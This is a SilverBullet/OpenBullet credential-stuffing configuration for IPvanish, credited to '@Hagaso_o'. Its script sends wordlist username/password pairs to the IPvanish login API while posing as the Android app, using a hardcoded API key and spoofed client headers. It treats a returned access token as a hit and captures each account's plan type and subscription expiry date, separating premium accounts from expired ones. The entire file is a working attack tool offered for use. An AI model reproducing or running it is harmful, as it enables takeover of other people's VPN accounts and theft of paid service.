[SETTINGS]
{
  "Name": "IPvanish.com-Api-Hagasoo",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-02-12T12:52:45.9959232+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Hagaso_o",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "IPvanish",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Guid FUNCTION GenerateGUID -> VAR "GU" 

#Post_Data REQUEST POST "https://api.ipvanish.com/api/v3/login" 
  CONTENT "{\"api_key\":\"15cb936e6d19cd7db1d6f94b96017541\",\"client\":\"Android-3.4.7.10.123495b123495\",\"os\":\"25\",\"password\":\"<PASS>\",\"username\":\"<USER>\",\"uuid\":\"<GU>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Android/ipvanish/1.2." 
  HEADER "X-Client: ipvanish" 
  HEADER "X-Client-Version: 1.2." 
  HEADER "X-Platform: Android" 
  HEADER "X-Platform-Version: 25" 
  HEADER "Content-Type: application/json; charset=utf-8" 
  HEADER "Host: api.ipvanish.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The username or password provided is incorrect" 
  KEYCHAIN Success OR 
    KEY "access_token" 

#Time PARSE "<SOURCE>" JSON "sub_end_epoch" -> VAR "Time" 

#A_T PARSE "<SOURCE>" JSON "account_type" -> VAR "A_T" 

#Plan FUNCTION Translate 
  KEY "1" VALUE "Free" 
  KEY "2" VALUE "Premium" 
  KEY "3" VALUE "Expired" 
  "<A_T>" -> CAP "Plan" 

#Expiry-time FUNCTION UnixTimeToDate "yyyy-MM-dd" "<Time>" -> CAP "Expiry-time" 

#Check FUNCTION UnixTimeToDate "yyyy" "<Time>" -> VAR "Check" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "<Check>" GreaterOrEqual "2022" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Check>" LessThan "2022" 

#Author FUNCTION Constant "@Hagaso_o" -> CAP "ConfigBy" 

